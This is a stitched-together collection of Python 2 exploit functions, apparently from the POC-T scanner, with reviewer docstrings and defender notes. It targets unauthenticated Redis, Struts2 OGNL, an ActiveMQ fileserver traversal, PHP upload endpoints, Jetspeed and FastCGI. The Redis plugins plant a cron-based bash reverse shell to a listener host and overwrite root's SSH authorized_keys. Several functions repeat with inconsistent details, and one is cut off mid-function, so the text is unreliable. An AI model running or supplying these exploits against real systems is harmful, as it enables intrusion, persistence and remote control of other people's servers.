def poc(url):
    """Check whether a Redis instance answers without AUTH and accepts CONFIG SET/SAVE.

    ``url`` is ``host[:port]``; the port defaults to 6379.  A web port must also
    answer on the host (80/443/8080/8443) or the function returns False.

    Returns False when no web port answers or when any Redis call raises or INFO
    lacks ``redis_version``.  On the success path the function falls off the end
    and returns None (falsy), and ``real_url`` is computed but never used.

    NOTE(review): this is not a read-only probe -- it sets a key, changes ``dir``
    and ``dbfilename`` and calls SAVE, which when it succeeds leaves a dump file
    at /root/dump.rdb on the target.  For defenders, CONFIG SET dir/dbfilename
    followed by SAVE from an unauthenticated client is the signal; requirepass,
    binding to localhost and renaming/disabling CONFIG stop it.
    """
    url = host2IP(url)
    ip = url.split(":")[0]
    port = int(url.split(":")[-1]) if ":" in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # look for a web service on a common port
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ":" + str(web_port))
            except Exception:
                real_url = ip + ":" + str(web_port)
            break  # TODO simplified: only the first responding port is considered
    else:
        return False

    try:
        # No password is passed: the connection only works if AUTH is not required.
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if "redis_version" not in r.info():  # INFO answered => unauthenticated access
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # is the instance writable?
        r.config_set("dir", "/root/")  # write permission check (original note: /var/www intended, /root used for now)
        r.config_set("dbfilename", "dump.rdb")  # is CONFIG SET permitted?
        r.delete(key)
        r.save()  # can a dump be written to disk?
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        return False
def poc(url):
    """Probe the Jetspeed usermanager REST endpoint for unauthenticated user creation.

    Normalises ``url`` to a scheme + domain, then posts a registration for a
    random user twice.  The second post is expected to fail with the
    ``PRINCIPAL_ALREADY_EXISTS`` marker when the first one created the account.

    Returns True when the marker is seen and ENABLE_EXP is off, False when the
    marker is absent or, with ENABLE_EXP off, when a request raises; in the
    remaining ENABLE_EXP cases it falls through and returns None.

    NOTE(review): not read-only -- a successful probe leaves the random account
    on the target, and nothing here removes it.  TLS verification is disabled.
    For defenders, unauthenticated POSTs to
    /jetspeed/services/usermanager/users/ are the signal; the account name is
    random, so hunt in registration/audit logs rather than by name.
    """
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',  # value appears masked by the hosting site -- confirm against the original plugin
        'newrule': ''
    }
    try:
        # NOTE(review): ``firefox`` is passed uncalled here, while sibling plugins use
        # ``firefox()``; if it is a function the header carries its repr -- confirm.
        requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
        c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        if not ENABLE_EXP:
            return False
def poc(url):
    """Check whether a Redis instance answers without AUTH and accepts CONFIG SET/SAVE.

    ``url`` is ``host[:port]``; the port defaults to 6379.  A web port must also
    answer on the host (80/443/8080/8443) or the function returns False.

    Returns False when no web port answers or when any Redis call raises or INFO
    lacks ``redis_version``.  On the success path the function falls off the end
    and returns None (falsy), and ``real_url`` is computed but never used.

    NOTE(review): this is not a read-only probe -- it sets a key, changes ``dir``
    and ``dbfilename`` and calls SAVE, which when it succeeds leaves a dump file
    at /root/dump.rdb on the target.  For defenders, CONFIG SET dir/dbfilename
    followed by SAVE from an unauthenticated client is the signal; requirepass,
    binding to localhost and renaming/disabling CONFIG stop it.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # look for a web service on a common port
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)
            break  # TODO simplified: only the first responding port is considered
    else:
        return False

    try:
        # No password is passed: the connection only works if AUTH is not required.
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # INFO answered => unauthenticated access
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # is the instance writable?
        r.config_set('dir', '/root/')  # write permission check (original note: /var/www intended, /root used for now)
        r.config_set('dbfilename', 'dump.rdb')  # is CONFIG SET permitted?
        r.delete(key)
        r.save()  # can a dump be written to disk?
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        return False
def poc(url):
    """Test an unauthenticated file write via ``/dapur/apps/app_theme/libs/save_file.php``.

    Posts a small PHP file (echoing md5 of a random plaintext) with a random
    ``.php`` name to ``save_file.php``, then requests that name back and looks
    for the expected digest.  Returns True only when the upload answered 200 and
    the digest appears in the fetched page; False otherwise, including on any
    exception.

    NOTE(review): not read-only -- a successful run leaves the uploaded .php file
    on the target.  For defenders, POSTs to save_file.php carrying ``src``/``content``
    fields and newly created files under app_theme/libs/ are the signals.
    """
    url = url if '://' in url else 'http://' + url
    path = url + '/dapur/apps/app_theme/libs/'
    filename = randomString(5) + '.php'
    upload_path = path + 'save_file.php'
    shell_path = path + filename
    plain, cipher = randomMD5()  # (plaintext, its md5) -- helper not shown on this page

    post_data = {
        'content': '<?php echo md5("{}");?>'.format(plain),
        'src': filename
    }

    header_data = {'Referer': 'http://localhost/'}  # presumably the upload script checks Referer -- confirm

    try:
        r = requests.post(url=upload_path,
                          data=post_data,
                          headers=header_data,
                          timeout=3)
        shell = requests.get(shell_path)  # no timeout here, unlike the POST -- can hang
        # NOTE: ``is 200`` compares identity, not value; it works in CPython only
        # because small ints are cached.  ``== 200`` is the correct comparison.
        if r.status_code is 200 and cipher in shell.content:
            return True

    except Exception:
        return False

    return False
def poc(host):
    """Timing-based username enumeration against ``host``.

    Measures the response time for a random (non-existent) name as a baseline,
    then flags every entry of the module-level ``users`` list whose response
    takes more than ``delay`` longer (``users``, ``delay`` and
    ``getResponseTime`` are not shown on this page).

    Returns the list of flagged names, or False when none were flagged.

    NOTE(review): each name is timed once, so network jitter can produce false
    positives; the baseline is also taken only once.  ``ans.__len__()`` is the
    non-idiomatic form of ``len(ans)``.  For defenders the signal is a burst of
    login/lookup requests for many distinct usernames from one source.
    """
    ans = []
    base_time = getResponseTime(randomString(), host)
    for user in users:
        if getResponseTime(user, host) - base_time > delay:
            ans.append(user)
    return ans if ans.__len__() else False
def poc(host):
    """Timing-based username enumeration against ``host``.

    Measures the response time for a random (non-existent) name as a baseline,
    then flags every entry of the module-level ``users`` list whose response
    takes more than ``delay`` longer (``users``, ``delay`` and
    ``getResponseTime`` are not shown on this page).

    Returns the list of flagged names, or False when none were flagged.

    NOTE(review): each name is timed once, so network jitter can produce false
    positives; the baseline is also taken only once.  ``ans.__len__()`` is the
    non-idiomatic form of ``len(ans)``.  For defenders the signal is a burst of
    login/lookup requests for many distinct usernames from one source.
    """
    ans = []
    base_time = getResponseTime(randomString(), host)
    for user in users:
        if getResponseTime(user, host) - base_time > delay:
            ans.append(user)
    return ans if ans.__len__() else False
def poc(base):
    """Test a path-traversal PUT through ``/fileserver/`` into ``/admin/``.

    Uploads random data (or JSP_UPLOAD when ENABLE_EXP is set) with a PUT whose
    path traverses out of ``/fileserver/`` into ``/admin/<name>.jsp``, using the
    default ``admin:admin`` basic-auth credentials, then GETs the file back.

    Returns the admin URI when the PUT answered 204 and the GET 200 (with
    ENABLE_EXP off, additionally only if the uploaded bytes are echoed back),
    False on any exception, and None when the status codes do not match.

    NOTE(review): not read-only -- a successful run leaves a .jsp file under
    /admin/ on the target.  The request shape looks like the ActiveMQ fileserver
    traversal issue -- confirm.  For defenders, PUTs to /fileserver/ containing
    ``..`` sequences and default admin credentials are the signals.
    """
    base = "http://" + base if "://" not in base else base
    name = randomString(5)
    uri = "{url}/admin/{name}.jsp".format(url=base.rstrip("/"), name=name)
    target = r"{url}/fileserver/sex../../..\admin/{name}.jsp".format(url=base.rstrip("/"), name=name)
    key = base64.b64encode("admin:admin")  # Python 2: encodes a str; on Python 3 this needs bytes
    # NOTE: the closing "}" is sent as part of the header value ("Basic <b64>}"),
    # which is almost certainly a typo -- confirm against the original plugin.
    headers = {"Authorization": "Basic %s}" % key, "User-Agent": "Mozilla/5.0 Gecko/20100101 Firefox/45.0"}
    put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)  # JSP_UPLOAD is a module global not shown here
    try:
        res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
        res2 = requests.get(uri, headers=headers, timeout=10)
        if res1.status_code == 204 and res2.status_code == 200:
            if ENABLE_EXP:
                return uri
            return uri if put_data in res2.content else False
    except Exception, error:  # Python 2 syntax; ``error`` is unused
        # print error
        return False
def poc(url):
    """Probe the Jetspeed usermanager REST endpoint for unauthenticated user creation.

    Normalises ``url`` to a scheme + domain, then posts a registration for a
    random user twice.  The second post is expected to fail with the
    ``PRINCIPAL_ALREADY_EXISTS`` marker when the first one created the account.

    Returns True when the marker is seen and ENABLE_EXP is off, False when the
    marker is absent or, with ENABLE_EXP off, when a request raises; in the
    remaining ENABLE_EXP cases it falls through and returns None.

    NOTE(review): not read-only -- a successful probe leaves the random account
    on the target, and nothing here removes it.  TLS verification is disabled.
    For defenders, unauthenticated POSTs to
    /jetspeed/services/usermanager/users/ are the signal; the account name is
    random, so hunt in registration/audit logs rather than by name.
    """
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',  # value appears masked by the hosting site -- confirm against the original plugin
        'newrule': ''
    }
    try:
        # NOTE(review): ``firefox`` is passed uncalled here, while sibling plugins use
        # ``firefox()``; if it is a function the header carries its repr -- confirm.
        requests.post(url1,
                      data=data1,
                      headers={'User-Agent': firefox},
                      timeout=10,
                      verify=False)
        c = requests.post(url1,
                          data=data1,
                          headers={
                              'User-Agent': firefox
                          },
                          timeout=10,
                          verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        if not ENABLE_EXP:
            return False
def poc(base):
    """Test a path-traversal PUT through ``/fileserver/`` into ``/admin/``.

    Uploads random data (or JSP_UPLOAD when ENABLE_EXP is set) with a PUT whose
    path traverses out of ``/fileserver/`` into ``/admin/<name>.jsp``, using the
    default ``admin:admin`` basic-auth credentials, then GETs the file back.

    Returns the admin URI when the PUT answered 204 and the GET 200 (with
    ENABLE_EXP off, additionally only if the uploaded bytes are echoed back);
    False on any exception or when the status codes do not match.

    NOTE(review): not read-only -- a successful run leaves a .jsp file under
    /admin/ on the target.  The request shape looks like the ActiveMQ fileserver
    traversal issue -- confirm.  For defenders, PUTs to /fileserver/ containing
    ``..`` sequences and default admin credentials are the signals.
    """
    base = "http://" + base if '://' not in base else base
    name = randomString(5)
    uri = '{url}/admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
    target = r'{url}/fileserver/sex../../..\admin/{name}.jsp'.format(
        url=base.rstrip('/'), name=name)
    key = base64.b64encode("admin:admin")  # Python 2: encodes a str; on Python 3 this needs bytes
    headers = {
        # NOTE: the closing "}" is sent as part of the header value ("Basic <b64>}"),
        # which is almost certainly a typo -- confirm against the original plugin.
        'Authorization': 'Basic %s}' % key,
        'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/45.0'
    }
    put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)  # JSP_UPLOAD is a module global not shown here
    try:
        res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
        res2 = requests.get(uri, headers=headers, timeout=10)
        if res1.status_code == 204 and res2.status_code == 200:
            if ENABLE_EXP:
                return uri
            return uri if put_data in res2.content else False
    except Exception:
        return False
    return False
def poc(url):
    """Probe the member registration endpoint for a remote-image fetch that stores a .php file.

    Submits a registration whose ``info[content]`` field contains an ``<img>``
    pointing at the module-level PUBLIC_URL with a ``?.php#.jpg`` suffix
    (PUBLIC_URL and TIMEOUT are not shown on this page).  When the response
    contains both ``MySQL Error`` and ``http``, the first ``http...php`` span of
    the response text is returned as the stored-file URL.

    Returns that URL on success, False on any exception, and None when the
    markers are absent.

    NOTE(review): detection relies on the target leaking a MySQL error message;
    a hardened install with error display off will not be flagged even if the
    fetch happens.  For defenders, registrations whose content field carries an
    ``<img>`` with a ``.php`` in the query string are the signal; disabling
    remote image fetching and error display are the mitigations.
    """
    url = url if '://' in url else 'http://' + url
    # NOTE: rstrip('/index.php') strips any trailing characters from the set
    # {/, i, n, d, e, x, ., p, h}, not the suffix "/index.php" -- e.g. a path ending
    # in "/shop" loses its trailing "p".  A suffix check was almost certainly intended.
    url = url.split('#')[0].split('?')[0].rstrip('/').rstrip('/index.php')
    data = {
        "siteid": "1",
        "modelid": "1",
        "username": randomString(10),
        "password": randomString(10),
        "email": "{}@qq.com".format(randomString()),
        "info[content]": "<img src={}?.php#.jpg>".format(PUBLIC_URL),
        "dosubmit": "1",
        "protocol": "",
    }

    target_url = url + "/index.php?m=member&c=index&a=register&siteid=1"
    try:
        r = requests.post(target_url, data=data, timeout=TIMEOUT)
        if "MySQL Error" in r.content and "http" in r.content:
            # first "http" up to the first ".php" in the page; ValueError from
            # index() is swallowed by the except below
            successUrl = r.text[r.text.index("http"):r.text.index(".php")] + ".php"
            return successUrl
    except Exception:
        return False
def poc(url):
    """Check a Struts2 ``.action`` endpoint for OGNL evaluation via ``debug=browser``.

    Normalises ``url`` (scheme, query stripped, redirect followed when the path
    has no ``.action``), then GETs the endpoint with an ``object=`` OGNL
    expression that writes a random ``key`` into the response.  The endpoint is
    reported vulnerable when ``key`` appears in the body and the literal
    ``xwork2.dispatcher`` does not (the latter excludes a plain echo of the
    request parameters).

    Returns the normalised URL on success, False on any exception, and None
    when the marker is absent.

    NOTE(review): ``redirectURL`` is called outside the ``try``, so a failure
    there propagates to the caller.  For defenders, requests carrying
    ``debug=browser`` together with an ``object=`` parameter containing
    ``%23``/``#`` OGNL syntax are the signal; devMode must be off in production.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        return False
def poc(url):
    """Check a Struts2 ``.action`` endpoint for OGNL evaluation via ``debug=browser``.

    Normalises ``url`` (scheme, query stripped, redirect followed when the path
    has no ``.action``), then GETs the endpoint with an ``object=`` OGNL
    expression that writes a random ``key`` into the response.  The endpoint is
    reported vulnerable when ``key`` appears in the body and the literal
    ``xwork2.dispatcher`` does not (the latter excludes a plain echo of the
    request parameters).

    Returns the normalised URL on success; otherwise None -- unlike sibling
    plugins, an exception is only logged at debug level, not turned into False.

    NOTE(review): ``redirectURL`` is called outside the ``try``, so a failure
    there propagates to the caller.  For defenders, requests carrying
    ``debug=browser`` together with an ``object=`` parameter containing
    ``%23``/``#`` OGNL syntax are the signal; devMode must be off in production.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:  # Python 2 syntax
        logging.debug(e)  # swallowed: caller sees None, same as "not vulnerable"
def poc(url):
    """Plant a cron entry through an unauthenticated Redis instance.

    Connects to ``host[:port]`` (default 6379) without a password.  If INFO
    answers, stores a crontab line (a bash reverse shell to the module-level
    ``listen_ip``/``listen_port``, not shown here) in a random key, points
    ``dir``/``dbfilename`` at ``/var/spool/cron/root`` and calls SAVE, then
    deletes the key and moves ``dir`` to /tmp.

    Returns True once SAVE has been issued, False on any exception, and None
    when INFO lacks ``redis_version``.  Whether cron actually runs the line is
    not checked.

    NOTE(review): this is an exploit, not a read-only check -- it overwrites
    ``/var/spool/cron/root`` on the target with an RDB dump.  For defenders,
    CONFIG SET dir/dbfilename followed by SAVE from an unauthenticated client,
    and non-crontab files under /var/spool/cron, are the signals; requirepass,
    bind 127.0.0.1, rename-command CONFIG and not running Redis as root stop it.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)  # no password: needs AUTH to be off
        if 'redis_version' in r.info():
            payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,
                                                                                             port=str(listen_port))
            path = '/var/spool/cron'
            name = 'root'
            key = randomString(10)
            r.set(key, payload)
            r.config_set('dir', path)
            r.config_set('dbfilename', name)
            r.save()  # writes the dump (containing payload) to /var/spool/cron/root
            r.delete(key)  # remove the key again (cleanup); the file on disk remains
            r.config_set('dir', '/tmp')
            return True
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        # print e
        return False
def poc(url):
    """Plant a cron entry through an unauthenticated Redis instance.

    Connects to ``host[:port]`` (default 6379) without a password.  If INFO
    answers, stores a crontab line (a bash reverse shell to the module-level
    ``listen_ip``/``listen_port``, not shown here) in a random key, points
    ``dir``/``dbfilename`` at ``/var/spool/cron/root`` and calls SAVE, then
    deletes the key and moves ``dir`` to /tmp.

    Returns True once SAVE has been issued, False on any exception, and None
    when INFO lacks ``redis_version``.  Whether cron actually runs the line is
    not checked.

    NOTE(review): this is an exploit, not a read-only check -- it overwrites
    ``/var/spool/cron/root`` on the target with an RDB dump.  For defenders,
    CONFIG SET dir/dbfilename followed by SAVE from an unauthenticated client,
    and non-crontab files under /var/spool/cron, are the signals; requirepass,
    bind 127.0.0.1, rename-command CONFIG and not running Redis as root stop it.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)  # no password: needs AUTH to be off
        if 'redis_version' in r.info():
            payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(
                ip=listen_ip, port=str(listen_port))
            path = '/var/spool/cron'
            name = 'root'
            key = randomString(10)
            r.set(key, payload)
            r.config_set('dir', path)
            r.config_set('dbfilename', name)
            r.save()  # writes the dump (containing payload) to /var/spool/cron/root
            r.delete(key)  # remove the key again (cleanup); the file on disk remains
            r.config_set('dir', '/tmp')
            return True
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        # print e
        return False
def poc(url):
    """Write an SSH public key through an unauthenticated Redis instance and test SSH.

    Connects to ``host[:port]`` (default 6379) without a password after
    confirming TCP/22 is open.  If INFO answers, stores the module-level
    ``public_key`` (not shown here) in a random key, points ``dir``/``dbfilename``
    at ``/root/.ssh/authorized_keys`` and calls SAVE, deletes the key, moves
    ``dir`` to /tmp, waits 5 s and then calls ``testConnect(ip, 22)`` (not shown).

    Returns False when port 22 is closed or on any exception, True when
    ``testConnect`` succeeds, and None otherwise.

    NOTE(review): this is an exploit, not a read-only check -- it overwrites
    ``/root/.ssh/authorized_keys`` on the target with an RDB dump.  The Redis
    client here has no ``socket_timeout``, unlike the sibling plugins, so a
    silent host can stall the scan.  For defenders, CONFIG SET dir pointing at an
    .ssh directory followed by SAVE, and an authorized_keys file that is not
    plain text, are the signals; requirepass, bind 127.0.0.1, rename-command
    CONFIG and not running Redis as root stop it.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)  # no password and no timeout
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()  # writes the dump (containing the key) to /root/.ssh/authorized_keys
            r.delete(key)  # remove the key again (cleanup); the file on disk remains
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        # print e
        return False
def poc(url):
    """Write an SSH public key through an unauthenticated Redis instance and test SSH.

    Connects to ``host[:port]`` (default 6379) without a password after
    confirming TCP/22 is open.  If INFO answers, stores the module-level
    ``public_key`` (not shown here) in a random key, points ``dir``/``dbfilename``
    at ``/root/.ssh/authorized_keys`` and calls SAVE, deletes the key, moves
    ``dir`` to /tmp, waits 5 s and then calls ``testConnect(ip, 22)`` (not shown).

    Returns True when ``testConnect`` succeeds and False in every other case,
    including any exception.

    NOTE(review): this is an exploit, not a read-only check -- it overwrites
    ``/root/.ssh/authorized_keys`` on the target with an RDB dump.  The Redis
    client here has no ``socket_timeout``, unlike the sibling plugins, so a
    silent host can stall the scan.  For defenders, CONFIG SET dir pointing at an
    .ssh directory followed by SAVE, and an authorized_keys file that is not
    plain text, are the signals; requirepass, bind 127.0.0.1, rename-command
    CONFIG and not running Redis as root stop it.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)  # no password and no timeout
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()  # writes the dump (containing the key) to /root/.ssh/authorized_keys
            r.delete(key)  # remove the key again (cleanup); the file on disk remains
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception:
        return False
    return False
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = [email protected]
"""
PHP FastCGI Fileread/RCE PoC & Exp
"""

from plugin.util import randomString
import socket

PORT = 9000  # TCP port the FastCGI probe connects to

EXPLOIT = False  # set "True" to exec system commands
COMMAND = 'whoami'  # command used only when EXPLOIT is True (consumed by exp_data(), not shown here)
PHP_FILE_PATH = '/usr/share/php/PEAR.php'  # PHP file on the target the request points at -- used by poc_data()/exp_data(), not shown here
# Marker searched for in the FastCGI reply: a random token when exploiting,
# ':root:' otherwise -- presumably a substring of the file the probe reads; confirm against poc_data().
FLAG = randomString(10) if EXPLOIT else ':root:'


def poc(ip):
    """Send the FastCGI request to ``ip``:PORT and look for FLAG in the reply.

    Returns ``ip -> <text after FLAG>`` when EXPLOIT is set, True otherwise.

    NOTE(review): the listing is cut off on this page -- the ``try`` has no
    ``except``/``finally`` and the no-match path is missing, so the function as
    shown is not complete Python.  ``exp_data()``/``poc_data()`` are not shown.
    """
    payload = exp_data() if EXPLOIT else poc_data()

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3.0)
    try:
        sock.connect((ip, PORT))
        sock.send(payload)  # send() may write only part of payload; sendall() is the usual call
        ret = sock.recv(1024)  # single read: a reply longer than 1024 bytes is truncated
        sock.close()  # skipped if connect/send/recv raise, since there is no finally

        # NOTE: str.find() returns -1 when FLAG is absent, and -1 is truthy, so this
        # branch is taken whenever FLAG is NOT at offset 0 -- false positives;
        # ``!= -1`` (or ``FLAG in ret``) was almost certainly intended.
        if ret.find(FLAG):
            return ip + ' -> ' + ret.split(FLAG)[1] if EXPLOIT else True
"""

import requests
from plugin.useragent import firefox
from plugin.util import randomString, redirectURL


def poc(url):
    """Check a Struts2 ``.action`` endpoint for OGNL evaluation via ``debug=browser``.

    Normalises ``url`` (scheme, query stripped, redirect followed when the path
    has no ``.action``), then GETs the endpoint with an ``object=`` OGNL
    expression that writes a random ``key`` into the response.  The endpoint is
    reported vulnerable when ``key`` appears in the body and the literal
    ``xwork2.dispatcher`` does not (the latter excludes a plain echo of the
    request parameters).

    Returns the normalised URL on success and False in every other case,
    including a failed redirect lookup or a failed request.

    NOTE(review): for defenders, requests carrying ``debug=browser`` together
    with an ``object=`` parameter containing ``%23``/``#`` OGNL syntax are the
    signal; devMode must be off in production.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception, e:  # Python 2 syntax; ``e`` is unused
            return False
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:  # Python 2 syntax; ``e`` is unused
        return False
    return False